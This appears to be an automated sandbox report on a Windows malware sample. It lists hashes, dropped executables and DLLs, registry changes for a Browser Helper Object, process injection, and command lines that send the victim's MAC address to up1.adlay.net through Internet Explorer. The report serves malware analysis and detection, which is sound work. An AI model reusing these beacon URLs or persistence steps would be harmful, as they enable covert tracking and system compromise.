Analysis
-
max time kernel
137s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-03-2024 17:18
Static task
static1
Behavioral task
behavioral1
Sample
dc2f1aa97d98d83b66f0d5253bb41165.exe
Resource
win7-20240221-en
General
-
Target
dc2f1aa97d98d83b66f0d5253bb41165.exe
-
Size
480KB
-
MD5
dc2f1aa97d98d83b66f0d5253bb41165
-
SHA1
50b29cb8c0d3bbcdc95f4681557a886ae4efdd62
-
SHA256
ebf662eb519aa12b8a23b9088490eaf8a45101314faf5496898f2c327e705e72
-
SHA512
8467b665f696280835e49ec625a71e0944d5f1f54ff7ef42fc729c24ba8e93fc3bde9bb352b3a026b710bb76441b5d64bd332a994385c05dd4ecfce5a6bd3228
-
SSDEEP
3072:zBm/NmZbzsAsEJORf8R3yM5UG/LMFlfXztiU1PQM5UG/LMFlfXpmZb:dmFmZHwzaCM//wJP1oM//w5mZ
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2484 Winupdate.exe 2664 Winspss.exe -
Loads dropped DLL 7 IoCs
pid Process 2580 regsvr32.exe 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 2484 Winupdate.exe 2484 Winupdate.exe 2484 Winupdate.exe 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe -
Installs/modifies Browser Helper Object 2 TTPs 1 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} regsvr32.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\WINDOWS\SysWOW64\4875\Winspss.exe dc2f1aa97d98d83b66f0d5253bb41165.exe File created C:\WINDOWS\SysWOW64\4875\PowerHacker_Charm.dll dc2f1aa97d98d83b66f0d5253bb41165.exe File created C:\WINDOWS\SysWOW64\4875\PowerHacker.ini dc2f1aa97d98d83b66f0d5253bb41165.exe File created C:\Windows\SysWOW64\psjm.dll dc2f1aa97d98d83b66f0d5253bb41165.exe File created C:\WINDOWS\SysWOW64\4875\Winupdate.exe dc2f1aa97d98d83b66f0d5253bb41165.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20053ad6b37bda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417203387" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0D79C1B1-E7A7-11EE-9F01-52C7B7C5B073} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000aaa1be96b39d0589025b1160a609f92dcb0b07fb6df2e3671ec8f8af8dc692db000000000e8000000002000020000000bbfe01b4d671b2217254970be7e9cf62cf85a6c031748092187e3808bf77f93b90000000d2f359b6418489602ccd499098e2cf8bb6c41515058082559b9f81d5bb082abab336101f2931db0dc471b00ddf92f121feba612e40d31bbf1a18e4eb4331a2e076b65b0de8f7efd7ff492d24234e479add1a471a56e0cd6b15bc26e92af82759cf67c3dd54eb9c4fcb3b5f2f9e07797138e8ff4a781f3cbd76f9feaf409fca00cc3eba98b36314da5d74a86e308e34604000000023a2835a1fd42646ba0b67747914d7ac54a7e7302d11dac1fb6d394628ce17e146f3b10ec53bc2e161b5a3c002d203289ce1c8296cf62c4bb531a87bd8c932ff iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000566a0e7b8e772887c04882c47cfc98463016a73d7514a879cf1a4e8f4180018a000000000e80000000020000200000000a42c1dba94c9050217f18ea7c062d2c49f7beff334b5297f597de48d0e8a7c0200000004aae2468b2ff3bc05fc3845f5c83445b8b5b940bf4970576691d69c0f6e857494000000093d57fab261d7901d49d30a91b38ef36a88741750a959deeb9dc23d3030bddbd288639409cf7d004c6f2a8a7d4ffb21494ae151fe4c4efb4e683bc43b6b05f81 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe -
Modifies registry class 46 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID\ = "new.myb" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\ = "nop1 Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\psjm.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib\ = "{5399FC70-D920-4d82-8FDE-CC3AD2DE6B76}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR\ = "C:\\Windows\\SysWOW64" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID\ = "new.myb.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\ = "s 1.0 Type Library" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\Programmable regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ = "noep Class" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer\ = "new.myb.1" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\ = "nop1 Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ = "Imyob" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32\ = "C:\\Windows\\SysWOW64\\psjm.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS\ = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" regsvr32.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2968 iexplore.exe 2968 iexplore.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 2968 iexplore.exe 2968 iexplore.exe 2064 IEXPLORE.EXE 2064 IEXPLORE.EXE 2484 Winupdate.exe 2484 Winupdate.exe 2484 Winupdate.exe 2664 Winspss.exe 2664 Winspss.exe 2664 Winspss.exe 2968 iexplore.exe 2968 iexplore.exe 840 IEXPLORE.EXE 840 IEXPLORE.EXE 840 IEXPLORE.EXE 840 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2768 wrote to memory of 2968 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 28 PID 2768 wrote to memory of 2968 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 28 PID 2768 wrote to memory of 2968 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 28 PID 2768 wrote to memory of 2968 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 28 PID 2968 wrote to memory of 2064 2968 iexplore.exe 29 PID 2968 wrote to memory of 2064 2968 iexplore.exe 29 PID 2968 wrote to memory of 2064 2968 iexplore.exe 29 PID 2968 wrote to memory of 2064 2968 iexplore.exe 29 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2580 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 30 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2484 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 31 PID 2768 wrote to memory of 2664 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 32 PID 2768 wrote to memory of 2664 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 32 PID 2768 wrote to memory of 2664 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 32 PID 2768 wrote to memory of 2664 2768 dc2f1aa97d98d83b66f0d5253bb41165.exe 32 PID 2484 wrote to memory of 1664 2484 Winupdate.exe 34 PID 2484 wrote to memory of 1664 2484 Winupdate.exe 34 PID 2484 wrote to memory of 1664 2484 Winupdate.exe 34 PID 2484 wrote to memory of 1664 2484 Winupdate.exe 34 PID 2968 wrote to memory of 840 2968 iexplore.exe 35 PID 2968 wrote to memory of 840 2968 iexplore.exe 35 PID 2968 wrote to memory of 840 2968 iexplore.exe 35 PID 2968 wrote to memory of 840 2968 iexplore.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=52-c7-b7-c5-b0-73&key=kmj&pid=rain2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2064
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:603142 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:840
-
-
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s psjm.dll2⤵
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies registry class
PID:2580
-
-
C:\WINDOWS\SysWOW64\4875\Winupdate.exeWinupdate.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=52-c7-b7-c5-b0-73&key=kmj3⤵PID:1664
-
-
-
C:\WINDOWS\SysWOW64\4875\Winspss.exeWinspss.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2664
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58df00f33e4c169844aa4b57e3354b3dc
SHA1c08cca631cbee8f25db2f6652ceaa454f2e0c644
SHA256c533b5e3b544ff6f948fa773c81b34bd3d5b75ecad28712c33830d3d426e2eaa
SHA512b7700c8f6a4650adbff4f4b819f624c91b024f8ccb663125f38a2b209827ced3a9db97d9a5cd83f12ecec0e9d7723601f4b247a3addb5c65ddd2b38657d25062
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5affc4a2b17a2a95c19c7dc7d09158a65
SHA17bd639b169127e0a77aae6f7a3bd5839211a805a
SHA25661a650ba31a77fb73e3ab303c17fe99441b2a0d52a4e05effac4ce8643db5e58
SHA51253f03a291ab07d5bbf31fad9217a9c9b8a8384f9ca5ec8a63ec728a8885bea764364fb869d15f0ddb75677c5a9eabf31c3ec4be93c429a0753876e325b5cd4b6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f1da51153bacc38dc1fe1709f8b4b0a9
SHA1b3484f2c328b8a9ec1b4a83fc8d72969693ba279
SHA256704fb55a8a884d97992602862286b0511b6dd83830461ee4daa4bddacf4ffcc5
SHA512806b5c0ac61bcd4bd989a9e25b0c244545a0bb709c78923d47e4afac6159c9575fe1cc8ffbda027ad3daee56e9320f0a108f8e0a9fec2c7af19cadd4fbbd1eb0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD556158f3b2d7294a0f3be86391cc64cb1
SHA1216c8f660500bbf6ff38cccf905b52e403c9dd47
SHA2563e50f1f7f6d26722bcea53324d78c6a36d02a1a6ab17604d31197761fa304c0b
SHA512c4f1e21133a2bdc59bbac6a0c521a6a9102ad5abbca6a2e0499e1ec125092f281d9d634b9fda7a0b6b5a2c4a60a5ea1720c98cdf1c76a2aa5fc708bd15f67e84
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5749d7a32da84a13be906d553f2466375
SHA118cfb7aeebac2df675f682f9fb358d83683a5bb6
SHA25672ce61e6943586691577f25b5766048ba6df3d42f45213bc4a0b1a29944a5a7c
SHA5121db5d328ea5076cda90fcd321f6c12be757aff048ae99ae1fd2268f5b66d31b097a4d80f728f82a9a27418c4c9e2ef9dbf50d9f18d448d643fb899a35d10f489
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56e0175d98f0b8083f4dead5c9b44844b
SHA1fb3b8f6f7ce17db0d8771caa01d5dcb3ed2b46e0
SHA25693c5abc98d76daa51aca6b7520f77b8fb821aed5744b6a67df2f804ef6fa49cf
SHA512e70fefcc8d65978e9264b7be74fee6e8fe652a604d5db17fe34a129127c372a97f47e27479aae514566a0393c1b5c16160333d113d9cf527bebdf4b6b38b7933
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f66c445693656d2cd4a5130fa552a759
SHA17654eebab0f31546f1f1b8d027936574dc546c0a
SHA256829ec9059a0a99bd289742b12cd5ed656e05299744ecba56c55d1d38d9633984
SHA512474a7b3fed8754710b54f00cc6c24c50b12cb3ada8ce7269ea710d87fc3ecb283717675ed1ad2985d440dc065a4b448fc35e764a5409e37e560d0483de09d680
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e6ee25fb2f07aa6503b659d9962ed721
SHA1b35bc835425192974b0867cca27accd56787e8c7
SHA256c60d9b98d407c2d633a1f5489333452a34cda8f306b67cc3edc59eb6889704c1
SHA5127abcaff9a29d0ca87aa3aaac35b2d32993e9a497f561df16d03530f0448d2bc76f5323aca4109ec8f66ae0689beddc7bb17999ca09488ec17910c0a3cc3e08c3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD564e9d184b730f43e56686d635d3a5d56
SHA1e797fe62bf7bbb338682c64c5c076813bbb02918
SHA256a94a5f035ce253f4a27fc85ecd1d35eb3319fbcafc1407cbd6fbc81c258ab671
SHA512764ac022d03017222577d126be7bff53f8b18af868cbc19863da47c681617d5a2935e27efa2726089e237bd2fb434d8d484eac44ffa481ad8a16ace910271e61
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5347d53118157913966fca607a689d494
SHA18676a5de2dbfb910cde99af860255dff024077a8
SHA256f031bb3e024399117c029f670a01ca2c893957d426568f14afd5101d166b0fcf
SHA512e4f98aec823e84de049222a50a5a686a7b9013c95c734bb0f11da755aeb864bef87a4eff28a8eeb58877e15a23cbf39e9115f67a1fd899123139c5ffa6ae5386
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52057d319aaea8dffdd6538f65f046213
SHA12f3347f969acc40329146f6eb65d9f7f1dfd0f1f
SHA256d6ac44486a630b434cc2c983a9bfc1405b286258acdeb685dcb630f18bc2856b
SHA512d34c839a4f25e2f8af5c88eb083ebdda93b33c6fa5ad03bb35709aaddb51ea0a83bfb1cfe22e7b7d6260181f4027f4e08a5f04c7f8e1a6ceee1b68e98198c10f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5396075906327654fe2a3473eaedcd27b
SHA137ef3b084ce4af7b98f8b469ae43f458458a7e92
